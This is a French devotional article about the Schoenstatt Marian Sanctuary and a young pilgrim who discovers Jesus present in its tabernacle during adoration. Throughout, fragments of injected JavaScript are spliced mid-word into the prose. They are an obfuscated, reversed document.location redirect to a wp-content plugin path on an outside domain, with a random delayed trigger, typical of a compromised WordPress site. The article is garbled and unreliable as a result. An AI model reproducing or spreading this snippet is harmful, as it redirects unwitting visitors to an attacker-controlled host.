Le Sanctuaire Marial  est un temple de Dieu. Ça c’est évident parce qu’il y manifeste sa grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeur et son amour. Qui viennent à sa rencontre contemplent la splendeur du Seigneur comme l’aurore qui dissipe la nuit. Dans le Sanctuaire, Jésus est là !

Dans le Sanctuaire, Marie est là. Comme depuis qu’elle a conçu le Fils de Dieu, elle ne s’est jamais séparée de lui, c’est pourquoi même aujourd’hui, elle reste toujours à côté de son enfant. Marie a été un tabernacle vivant, elle a engendré qui l’a créé. celle qui a été sous la croix, qui peut l’empêcher d’être où que ce soit tout près de son Fils ?

Dans le Sanctuaire Marial de Schoenstatt, Jésus est présent dans le tabernacle. Qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and un pèlerin s’adresse à la Vierge, le Christ entend sa prière et vice-versa. C’est d’ailleurs la signification profonde de la croix d’unité rencontrée dans le Sanctuaire.

Certains pèlerins ignorent la présence de Jésus dans le Sanctuaire. Ils pensent que le Sanctuaire est seulement une maison de la Sainte Vierge en ignorant que Marie et son Fils sont en une très profonde unité et que jamais ils ne se sépareront pas.

Virginie MUNEZERO nous dit qu’elle ne connaissait pas elle aussi que dans le Sanctuaire il y a le tabernacle. C’est Jeudi. Comme tous les lundis, les mardis, les jeudis et les vendredis, les pèlerins font l’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration dans le Sanctuaire. Virginie dit que c’est surprise pour elle, qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and elle a vu Jésus dans le saint sacrent exposé sur l’autel : «  Je croyais que dans le Sanctuaire il n’y a que la Sainte Vierge Marie. C’est aujourd’hui que je remarque que Jésus est lui aussi présent qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and je l’ai trouvé dans l’ostensoir. Tous les jours que je suis venue ici, je ne me suis adressée qu’à la Vierge. C’est vrai qu’elle écoute aussi nos prières, mais savoir que Jésus lui-même est là, c’est encore plus super. »

La jeune fille reste convaincue que ses demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes ont été exaucées par l’intercession de Marie : « Ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont je suis sûre est que j’ai été écoutée et je remercie le Seigneur. »

Voilà alors ce qui détermine l’amour qu’il y ait entre la Maman et son Fils. Pour cela, Virginie remarque davantage la beauté du Sanctuaire : « Comme il est beau le Sanctuaire ! Mieux vaut y rester. Je me réjouis qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and je suis là. »

Selon lui, c’est un secret qu’elle vient de découvrir : « Aujourd’hui je sens en moi de plus qu’avant l’amour du Sanctuaire.  Savoir que Jésus est là augmente cet amour. »

Jésus qui a accepté d’être engendré par qui il a créé, comment ne pas rester tout près d’elle à l’éternité ? Même dans le ciel, Jésus est avec Marie.

 

Brigitte IRAKOZE

Laisser un commentaire